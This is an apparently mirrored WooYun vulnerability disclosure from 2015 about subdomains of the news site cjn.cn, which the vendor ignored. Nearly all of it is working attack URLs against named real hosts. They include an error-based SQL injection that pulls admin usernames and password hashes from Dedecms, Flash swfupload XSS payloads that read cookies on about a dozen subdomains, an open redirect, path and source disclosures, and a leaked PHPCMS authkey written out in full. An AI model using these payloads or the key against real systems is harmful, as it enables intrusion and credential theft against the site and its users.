乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-15: 细节已通知厂商并且等待厂商处理中 2015-12-20: 厂商已经主动忽略漏洞,细节向公众公开
RT
Dedecms /plus/download.php URL redirecthttp://app.cjn.cn/plus/download.php?open=1&link=aHR0cDovL3d3dy5iYWlkdS5jb20%3DDedecms Path Disclosurehttp://app.cjn.cn/data/mysql_error_trace.inc注入http://app.cjn.cn/plus/search.php?keyword=as&typeArr[111%3D@%60\%27%60%29+and+%28SELECT+1+FROM+%28select+count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28select+CONCAT%280x7c,userid,0x7c,pwd%29+from+%60%23@__admin%60+limit+0,1%29,1,62%29%29%29a+from+information_schema.tables+group+by+a%29b%29%23@%60\%27%60+]=a
Dedecms /plus/download.php URL redirecthttp://app1.cjn.cn/plus/download.php?open=1&link=aHR0cDovL3d3dy5iYWlkdS5jb20%3DDedecms Path Disclosurehttp://app1.cjn.cn/data/mysql_error_trace.inc注入http://app1.cjn.cn/plus/search.php?keyword=as&typeArr[111%3D@%60\%27%60%29+and+%28SELECT+1+FROM+%28select+count%28*%29,concat%28floor%28rand%280%29*2%29,%28substring%28%28select+CONCAT%280x7c,userid,0x7c,pwd%29+from+%60%23@__admin%60+limit+0,1%29,1,62%29%29%29a+from+information_schema.tables+group+by+a%29b%29%23@%60\%27%60+]=aflash xsshttp://app1.cjn.cn/images/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}http://byby.cjn.cn/images/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}http://hbjs.cjn.cn/statics/js/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}http://it.cjn.cn/images/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}http://jkys.cjn.cn/statics/js/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}http://lady.cjn.cn/images/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}http://life.cjn.cn/images/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}http://pinyou.cjn.cn/images/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}http://wh2049.cjn.cn/images/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}http://www.cjn.cn/hs/images/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}http://www.cjn.cn/hs/images/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}http://yazg.cjn.cn/images/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}http://yy.cjn.cn/images/swfupload/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28document.cookie%29}}
源码泄露http://e.cjn.cn/upload.jsphttp://e.cjn.cn/image.jsp
http://jkys.cjn.cn/PHPCMS authkey泄露LNgIcALH2pF0kpzZN9rGVA2qZgP7ugc2
如上
危害等级:无影响厂商忽略
忽略时间:2015-12-20 11:00
漏洞Rank:4 (WooYun评价)
暂无